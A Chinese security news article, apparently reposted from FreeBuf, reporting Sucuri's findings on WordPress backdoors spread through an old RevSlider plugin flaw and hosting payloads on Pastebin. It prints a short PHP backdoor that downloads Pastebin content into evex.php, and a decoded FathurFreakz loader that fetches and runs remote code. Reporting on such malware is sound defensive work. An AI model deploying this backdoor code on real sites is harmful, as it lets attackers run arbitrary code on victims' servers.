品牌/运营/管理/IT综合咨询
IT/互联网+解决方案
业务及咨询:13919290690
售后支持:18693088690
info@radartek.com
support@radartek.com

隐匿在Pastebin上的后门

快速分享文本、代码的网站Pastebin常常被黑客们用来分享自己的库、窃取的数据和其他代码,而现在它真的被用于黑客攻击了。

近日安全研究人员居然发现黑客们正在通过Gmail草稿、Evernote等平台控制僵尸网络。安全公司Sucuri最近发布的博文介绍了一种新玩法:黑客利用流行的WordPress插件RevSlider的老版本漏洞传播新的后门变种,使用Pastebin.com放置恶意软件。下面就让我们一起来看看黑客们的新创意吧。

2.png

Sucuri公司近日发表了一篇博客,该博客详细解释了黑客是如何利用旧版本的RevSlider WordPress插件来传播一种新型后门,而该后门利用Pastebin.com网站服务来托管恶意代码文件。

恶意软件高级研究员Denis Sinegubko在博客中写道:

“这或多或少可以算得上是一个典型的后门。它从远程服务器下载恶意代码,并在受害网站上将这些恶意代码保存到一个文件中,使其随时可被执行。不过,比较有趣的一点是其远程服务器的选择,黑客既没将恶意代码文件托管在自己的网站,也不是肉鸡网站,而是在最受欢迎的Web应用网站Pastebin.com上。”
攻击者通过扫描目标网站来寻找含有漏洞的RevSlider插件。一旦发现,他们会利用RevSlider的另一个漏洞将后门代码上传到该网站。

if(array_keys($_GET)[0] == 'up'){
$content = file_get_contents("http://pastebin.com/raw.php?i=JK5r7NyS");
if($content){unlink('evex.php');
$fh2 = fopen("evex.php",'a');
fwrite($fh2,$content);
fclose($fh2);
}}else{print "test";}

关键后门代码

这是一份稍微复杂点的后门样本,是通过RevSlider漏洞上传的:

3.png

从截图中你可以看到这段代码将一段经过Base64编码的内容注入WordPress核心文件wp-links-opml.php中的$temp变量。以下是经过解密的$temp内容:

4.png

你可以看到它从Pastebin下载代码并立即执行。但这次只有当攻击者提供wp_nonce_once中的请求参数,也就是Pastebin的文章ID时才会运行。wp_nonce_once参数的使用使得管理员难以追踪恶意代码的具体地址(防止了网址被屏蔽),同时又增加了后门的灵活性———这样它就能够下载执行任何Pastebin上的代码——哪怕是那些一开始不存在的代码————只需要向wp-links-opml.php提供ID就行了。

FathurFreakz编码器

印度尼西亚黑客们有一款编码器与Pastebin配合默契。名字叫做PHP Encryptor by Yogyakarta Black Hat 或者是 by FathurFreakz。在 Pastebin.com网站上粘帖创建PHP代码,软件就会加密那个Pastebin网址,生成混淆后的代码:

5.png
解密后:

function FathurFreakz($ct3){
xcurl('http://pastebin.com/download.php?i='.code($ct3));
}
FathurFreakz(CODE);

这段代码会下载执行Pastebin上的代码(使用xcurl函数),ID在CODE常量中,并且经过加密。你可以看到另外一种Pastebin网址种类:download.php,基本上它跟raw.php一样,但它提供HTTP头,使得浏览器不会显示内容,而是直接以文件形式下载。
经过解密的代码(看起来他们超爱用Pastebin……):

6.png

给站长们敲响警钟

黑客在实时攻击的时候大规模利用Pastebin网站,这给网站管理员敲响了警钟,提示他们要时刻维护网站的CMS(内容管理系统)以防止插件被恶意利用。

就在几周前,一款新型针对WordPress的恶意软件SoakSoak,其主要攻击手段也是通过RevSlider的漏洞,上传一个后门,然后对所有使用相同服务器的网站进行感染。当时SoakSoak攻陷了约10万个WordPress站。

本文来源于:http://www.freebuf.com